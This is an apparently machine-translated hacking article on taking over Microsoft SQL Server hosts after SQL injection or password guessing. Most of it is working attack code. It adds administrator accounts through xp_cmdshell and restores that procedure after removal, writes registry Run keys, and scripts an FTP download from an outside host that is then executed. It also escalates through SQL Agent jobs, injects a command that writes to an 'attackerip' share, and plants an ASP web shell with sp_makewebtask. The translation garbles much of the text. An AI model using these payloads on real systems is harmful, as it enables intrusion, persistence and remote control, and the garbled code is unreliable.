Note: Very useful old articles, collecting a host opening 1433 port how can we use SQL injection or vast password remote connection What can I add a system administrator user (or execute system command) 1 ) .XP_cmdshell 'cmd.exe / c net user aaa bbb / add' Everyone knows the way, the biggest benefit is to have an obvious, but the most afraid of exists (SELECT * from dbo.sysObjects where id = Object_ID (N ' [dbo]. [xp_cmdshell] ') And ObjectProperty (ID, n'iseXtendedProc') = 1) Exec sp_dropextendedProc n '[dbo]. [xp_cmdshell]' Go can delete this extension in the T-SQL statement above. we generally use 2k: EXEC sp_addextendedproc xp_cmdshell, @ dllname = 'xplog70.dll' SQL97: EXEC sp_addextendedproc xp_cmdshell, @ dllname = 'xpsql70.dll' to restore the sp_addextendedproc but some people know it is only a process of storing the same. can be deleted DROP PROCEDURE sp_addextendedprocif exists (select * from dbo.sysobjects where id = object_id (N '[dbo]. [xp_cmdshell]') and OBJECTPROPERTY (id, N'IsExtendedProc ') = 1) exec sp_dropextendedproc N' [dbo] [xp_cmdshell] 'Go Restore: CREATE Procedure SP_ADDEXTENDEDPROC --- 1996/08/30 20: 13 @ functname nvarchar (517), / * (Owner.) Name of function to call * / @ dllname varchar (255) / * Name of DLL Containing Function * / ask @@Transactions Offif @@Trant> 0beginraiser ror (15002, -1, -1, 'sp_addextendedproc') return (1) end / *** Create the extended procedure mapping * / dbcc addextendedproc (@functname, @dllname) return (0) -. sp_addextendedprocGO die Oh I have written so many simple protection methods: first Net Stop Mssqlserver, then delete XPLog70.dll (SQL97 with xpsql70.dll) and then open the service to open it. 2) I will understand it. Xp_cmdshell is ultimately deleted, no other way? There is a write registry three: XP_REGWRITE 'HKEY_LOCAL_MACHINE', 'Software / Microsoft / Windows / CurrentVersion / Run', 'CZY82', 'REG_SZ', NET USER CZY BB / add actually registry also several places can be written, such as the web browsing setting in the registry, the way to write the registry is not good, not only did not return and can't run right away, I don't know if I don't know. 3) Declare @S INTEXEC SP_OACREATE "WScript.Shell"
@ s out - Exec sp_oamethod @s, "run", null, "cmd.exe / c echo open asp.7i24.com> c: /a.txt" - Exec sp_oamethod @s, "run", null , "cmd.exe / c echo 123321 >> c: /a.txt" - Exec sp_oamethod @s, "run", null, "cmd.exe / c echo 123321 >> c: /a.txt" - EXEC SP_OAMETHOD @S, "run", null, "cmd.exe / c: /a.txt" - Exec sp_oamethod @s, "run", null, "cmd.exe / c Echo Close >> C: /a.txt "- EXEC SP_OAMETHOD @S," run ", null," cmd.exe / c ftp -s: c: /a.txt "EXEC SP_OAMETHOD @S," run ", Null, "cmd.exe / c server" is right, as you can see, we can also use sp_oacreate and sp_oamethod, under their role we can call the system control, such as FSO, WSH, Shell, but there is a problem Is it like XP_CMDSHELL, really can't you see below: Declare @s int, @ o int, @ f int, @ Str nvarchar (4000) / * exec sp_oacreate "wscript.shell", @ s Outexec sp_oamethod @s, "run", null, "cmd.exe / c net user> c: / tele sp_oacreate" scripting.filesystemobject ", @o outexec sp_oamethod @o," opentextfile ", @f OUT, "C: /TEMP.TXT", 1exec sp_oamethod @f, "readall", @ Str Outprint @STR first execute the annotation, the actual principle, is simple, use> Write the result in a file and then use Fso is coming out! Very practical --------------------------------------- --- Write here to summarize the above three ways maybe everyone knows what you may know below --------------------- -------------------- 4) Use msdb; - Don't be Master 哟 EXEC SP_ADD_JOB @ Job_name = 'CZY82'; EXEC SP_ADD_JOBSTEP @ Job_Name = 'CZY82' @ step_name = 'exec my sql', @ subsystem = 'cmdexec', @ command = 'DIR C: /> C: /B.TXT'; EXEC SP_ADD_JOBSERVER @JOB_NAME = 'CZY82', @ server_name = 'smscomputer';
EXEC SP_START_JOB @ Job_Name = 'CZY82'; job processing using MSSQL is also executable and if the above subsystem's parameters are TSQL, then we can perform TSQL statements. For these stored procedures @server_name We want to specify your SQL server name The second system SQLServerAgent service must be opened (the default is not open) Net Start SQLServerAgent has a place in Dongdong, and it is also possible .. the system is also seen following tunnel USE msdbEXEC sp_add_job @job_name = 'GetSystemOnSQL', @ enabled = 1, @ description = 'This will give a low privileged user access toxp_cmdshell', @ delete_level = 1EXEC sp_add_jobstep @job_name = 'GetSystemOnSQL' @ step_name = 'exec my sql', @ subsystem = 'tsql', @ command = 'exec master..xp_execresultset N''Select' '' 'execMaster..xp_cmdshell "DIR> C: / agent-job-results. txt " '' '' '', N''Master '' 'EXEC sp_add_jobserver @job_name =' GetSystemOnSQL ', @ server_name =' your SQL server name 'EXEC sp_start_job @job_name =' GetSystemOnSQL 'Do not doubt the above code, I am a successful test! I have to pay attention to XP_ExecResultSet is because it will make us XP_cmdshell 5 as it can perform XP_cmdshell 5) About Microsoft SQL Agent Jobs can delete override vulnerabilities (public users can also) in Angocus articles: http : //www.xfocus.net/vuln/vul_view.php? VUL_ID = 2968 USE MSDBEXEC SP_ADD_JOB @JOB_NAME = 'ArbitraryFilecrea te ', @ enabled = 1, @ description =' This will create a file called c: /sqlafc123.txt ', @ delete_level = 1EXEC sp_add_jobstep @job_name =' ArbitraryFileCreate ', @ step_name =' SQLAFC ', @ subsystem =' TSQL ', @ command =' select '' Hello, this file was created by the sql agent. '', @ output_file_name = 'c: /sqlaf123.txt'exec sp_add_jobserver @
job_name = 'ArbitraryFileCreate', @ server_name = 'SERVER_NAME'EXEC sp_start_job @job_name =' ArbitraryFileCreate 'subsystem if the election is:?? tsql, it reads a file generated in the head ?? You rbitraryFileCreate 1, Zan QLAFC?? ???? 2003-02-07 18:24:19 ------------------------------------ ---------- Hello, this File Was created by the sql agent. (1 ?????) So I suggest that the file is best to generate the file, if you can use it, if we can write one Add administrator command VBS file to the startup directory! 6) About sp_makewebtask (files that can write any content any file name) About sp_mscopyscriptfile See the example declare @Command varchar (100) Declare @scripfile varchar (200) set contat_null_yields_null off select @ command = 'DIR C: /> "///attackerip/share/dir.txt" "' select @ scripfile = 'c: /autoexec.bat> NUL" |' @Command '| RD "EXEC SP_MSCOPYScriptfile @Scripfile , '' These two stoodies are still testing trying to make MSSQL's public users get a local web shell :) sp_makewebtask @ outputfile = 'd: /sms/a.asp', @ charset = GB2312, - @ query = 'select' '' '- @ query =' select '' <% response.write request.servervariables ("appl_physical_path")%> '' @ query = 'select' '<% on error resume next set oscript = Server.CreateObject ( "wscript.SHELL") Set oscriptNet = Server.CreateObject ( "wscript.NETWORK") Set oFileSys = Server.CreateObject ( "scripting.FileSystemObject") szCMD = Request.Form ( ". CMD") If (szCMD <> "") THEN SZTEMPFILE = "C: /" & OfileSys.getTempName () Call Oscript.Run ("cmd.exe / c" & szcmd & "> & sztempfile, 0, true) set ofile =
